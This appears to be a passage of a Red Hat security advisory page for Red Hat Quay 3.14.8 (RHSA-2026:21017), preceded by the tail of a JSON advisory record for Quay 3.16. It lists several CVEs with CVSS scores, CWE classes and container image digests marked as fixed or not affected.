            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.4,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "axios: Axios: Invisible JSON Response Tampering via Prototype Pollution Gadget"
    }
  ]
}

RHSA-2026:21017

Vulnerability from csaf_redhat - Published: 2026-05-26 17:12 - Updated: 2026-06-30 15:49

Summary

Red Hat Security Advisory: Red Hat Quay 3.14.8

Severity

Important

Notes

Topic: Red Hat Quay 3.14.8 is now available with bug fixes.

Details: Quay 3.14.8

CVE-2025-61726

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE-770 - Allocation of Resources Without Limits or Throttling

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le	—	Vendor Fix fix Workaround

Known not affected 23 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64	—	Workaround

Threats

Impact Important

CVE-2025-62718

7.0 (High)


                        
                          CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:L

CWE-1289 - Improper Validation of Unsafe Equivalence in Input

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le	—	Vendor Fix fix Workaround

Known not affected 23 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64	—	Workaround

Threats

Impact Important

CVE-2026-2377

6.5 (Medium)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

CWE-918 - Server-Side Request Forgery (SSRF)

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le	—	Vendor Fix fix

Known not affected 23 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64		—

Threats

Impact Important

CVE-2026-4427

No description is available for this CVE.

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le	—	Vendor Fix fix

Known not affected 23 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64		—
